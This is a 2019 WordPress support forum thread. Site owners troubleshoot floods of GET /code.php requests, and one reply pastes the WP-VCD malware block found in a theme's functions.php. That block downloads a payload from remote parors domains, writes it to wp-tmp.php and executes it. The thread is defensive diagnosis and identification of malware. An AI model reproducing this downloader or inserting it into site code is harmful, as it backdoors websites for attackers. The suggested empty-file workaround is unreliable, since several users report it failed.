Title: get /code.php http/1.0 Last modified: November 7, 2019 --- # get /code.php http/1.0 * [nicawordpress](https://wordpress.org/support/users/nicawordpress/) * (@nicawordpress) * [6 years, 7 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/) * There are thousands of these requests…also, some POST requests: * sudo tail -f /var/log/apache2/access.log 127.0.0.1 – – [06/Nov/2019:21:02:31 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-” 127.0.0.1 – – [06/Nov/2019: 21:02:31 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-” 127.0.0.1 – – [06/ Nov/2019:21:02:36 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-” 127.0.0.1––[ 06/Nov/2019:21:02:37 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-” 127.0.0.1––[ 06/Nov/2019:21:02:34 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-” 127.0.0.1––[ 06/Nov/2019:21:02:36 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-” * Can anyone help me track down the source of these connections? I ran several rootkit scanners on the server and didn’t find anything. I’ve been combing through the web directory looking for anything strange but haven’t found anything yet. Googling for code.php is useless * We faced a similar issue the day before yesterday. After checking the log, it turns that WordPress is trying to get /code.php file under root directory, where there isn’t any. It will generate many database connections and consume many system resources. A quick word around is to create an empty file named code.php under the website root directory. Make sure webapp is the owner of this file. I guess it is a bug of wordpress. Viewing 15 replies - 1 through 15 (of 19 total) 1 [2](https://wordpress.org/support/topic/get-code-php-http-1-0/page/2/?output_format=md) [→](https://wordpress.org/support/topic/get-code-php-http-1-0/page/2/?output_format=md) * [petrjirous](https://wordpress.org/support/users/petrjirous/) * (@petrjirous) * [6 years, 7 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/#post-12106465) * Actually I have the same issue since 2 days ago. Couldn’t find solution yet. * [petrjirous](https://wordpress.org/support/users/petrjirous/) * (@petrjirous) * [6 years, 7 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/#post-12106480) * Another strange thing is it keeps creating connections to database (at least 100 connections). Which is really strange because apache returns 404 on code. php file * [andreapia](https://wordpress.org/support/users/andreapia/) * (@andreapia) * [6 years, 7 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/#post-12106541) * I have the same issue since yesterday. I tried to put a blank code.php in the root but it didn’t work. I also tried to return a 404 error from Nginx. Do you have any suggestions? * [autotutorial](https://wordpress.org/support/users/autotutorial/) * (@autotutorial) * [6 years, 7 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/#post-12107077) * 127.0.0.1 means localhost, your webserver or an external ip attack. Do you use Apache with some module for load balancing or reverse proxy? If I have not used it it should be REMOTE_ADDRESS in the APACHE log. Example mod_rpfa,mod_cloudflare, mod_remoteip etc. * [envitro](https://wordpress.org/support/users/envitro/) * (@envitro) * [6 years, 7 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/#post-12108185) * I have literally the exact same thing happening. My server started crashing a few days ago and I’ve been trying to trace back to a root cause and came across this: * Seemingly this happens every 5-10 seconds. * 127.0.0.1 – – [07/Nov/2019:17:53:55 +0000] “GET /code.php HTTP/1.0” 301 – “-”“-” 127.0.0.1 – – [07/Nov/2019:17:59:01 +0000] “GET /code.php HTTP/1.0” 301 – “-”“-” 127.0.0.1 – – [07/Nov/2019:17:55:18 +0000] “GET /code.php HTTP/1.0” 301 – “-”“-” 127.0.0.1 – – [07/Nov/2019:18:02:47 +0000] “GET /code.php HTTP/1.0” 301 – “-”“-“ - This reply was modified 6 years, 7 months ago by [envitro](https://wordpress.org/support/users/envitro/). * [prashant2211](https://wordpress.org/support/users/prashant2211/) * (@prashant2211) * [6 years, 7 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/#post-12108242) * We are also facing same issue. Our website is hosted on Google cloud bitnami wordpress * [lowcarbsrezeptede](https://wordpress.org/support/users/lowcarbsrezeptede/) * (@lowcarbsrezeptede) * [6 years, 7 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/#post-12108559) * WordPress seems to be looking for code.php file and ends up creating lot of database connections if not found. After suggestions from awesome Bitnami support engineers, I created an empty file in the wordpress root directory and restarted the server. Website is back now. - This reply was modified 6 years, 7 months ago by [lowcarbsrezeptede](https://wordpress.org/support/users/lowcarbsrezeptede/). * [petrjirous](https://wordpress.org/support/users/petrjirous/) * (@petrjirous) * [6 years, 7 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/#post-12108847) * I confirm that creating empty code.php file helps. * [envitro](https://wordpress.org/support/users/envitro/) * (@envitro) * [6 years, 7 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/#post-12109241) * Yeah, for some stupid reason that actually worked, although it seems like something ripe for exploit… * [mattwiner](https://wordpress.org/support/users/mattwiner/) * (@mattwiner) * [6 years, 7 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/#post-12112670) * We got the SAME exact thing just about 2 days ago too. It was sucking up 8gb of ram, creating over 1000 httpd connections and hundreds of mysql connections. * Took 2 days to figure it out. Any idea where it came from? Some plugin? * We too created and empty code.php file and it stopped. - This reply was modified 6 years, 7 months ago by [mattwiner](https://wordpress.org/support/users/mattwiner/). * [cmgboy](https://wordpress.org/support/users/cmgboy/) * (@cmgboy) * [6 years, 7 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/#post-12112842) * Guys… i have de solution… You need to revome a block code in themes\your_theme\ functions.php * This code (or something similar) its making problems on wordpress.. * Note: Sorry, my english its terrible. * $wp_auth_key=’12335f8c45ff73be536601a7562a3220′; if (($tmpcontent = @file_get_contents(“ [http://www.parors.com/code.php”](http://www.parors.com/code.php”);) OR $tmpcontent = @file_get_contents_tcurl(“[http://www.parors.com/code.php”](http://www.parors.com/code.php”);)) AND stripos($tmpcontent, $wp_auth_key) !== false) { * if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup( $tmpcontent)); @file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent); * if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) { @file_put_contents( get_template_directory() . ‘/wp-tmp.php’, $tmpcontent); if (!file_exists(get_template_directory().‘/ wp-tmp.php’)) { @file_put_contents(‘wp-tmp.php’, $tmpcontent); } } * } } * elseif ($tmpcontent = @file_get_contents(“[http://www.parors.pw/code.php”](http://www.parors.pw/code.php”);) AND stripos($tmpcontent, $wp_auth_key) !== false ) { * if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup( $tmpcontent)); @file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent); * if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) { @file_put_contents( get_template_directory() . ‘/wp-tmp.php’, $tmpcontent); if (!file_exists(get_template_directory().‘/ wp-tmp.php’)) { @file_put_contents(‘wp-tmp.php’, $tmpcontent); } } * } } * elseif ($tmpcontent = @file_get_contents(“[http://www.parors.top/code.php”](http://www.parors.top/code.php”);) AND stripos($tmpcontent, $wp_auth_key) !== false ) { * if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup( $tmpcontent)); @file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent); * if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) { @file_put_contents( get_template_directory() . ‘/wp-tmp.php’, $tmpcontent); if (!file_exists(get_template_directory().‘/ wp-tmp.php’)) { @file_put_contents(‘wp-tmp.php’, $tmpcontent); } } * } } elseif ($tmpcontent = @file_get_contents(ABSPATH . ‘wp-includes/wp-tmp. php’) AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup( $tmpcontent)); * } elseif ($tmpcontent = @file_get_contents(get_template_directory() . ‘/wp-tmp. php’) AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup( $tmpcontent)); * } elseif ($tmpcontent = @file_get_contents(‘wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); * } * [envitro](https://wordpress.org/support/users/envitro/) * (@envitro) * [6 years, 7 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/#post-12116590) * So it appears to be a WP-VCD malware attack. Can someone else confirm? * [mattwiner](https://wordpress.org/support/users/mattwiner/) * (@mattwiner) * [6 years, 7 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/#post-12116592) * It looks like it: [https://wordpress.stackexchange.com/questions/333380/is-this-a-hacking-script-in-function-php](https://wordpress.stackexchange.com/questions/333380/is-this-a-hacking-script-in-function-php) * [Ahmad Syauqie](https://wordpress.org/support/users/ahsya/) * (@ahsya) * [6 years, 7 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/#post-12125765) * [@envitro](https://wordpress.org/support/users/envitro/) * Yes this WP-VCD attack. I’m struggling with it right now. Removed php files, clean up functions.php, but these request are still running. Any luck? * [Ahmad Syauqie](https://wordpress.org/support/users/ahsya/) * (@ahsya) * [6 years, 7 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/#post-12125771) * [@mattwiner](https://wordpress.org/support/users/mattwiner/) * I created empty code.php, and still running :(. Still googling and try anything. Viewing 15 replies - 1 through 15 (of 19 total) 1 [2](https://wordpress.org/support/topic/get-code-php-http-1-0/page/2/?output_format=md) [→](https://wordpress.org/support/topic/get-code-php-http-1-0/page/2/?output_format=md) The topic ‘get /code.php http/1.0’ is closed to new replies. * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/) * 19 replies * 13 participants * Last reply from: [krissmith](https://wordpress.org/support/users/krissmith/) * Last activity: [6 years, 3 months ago](https://wordpress.org/support/topic/get-code-php-http-1-0/page/2/#post-12508211) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics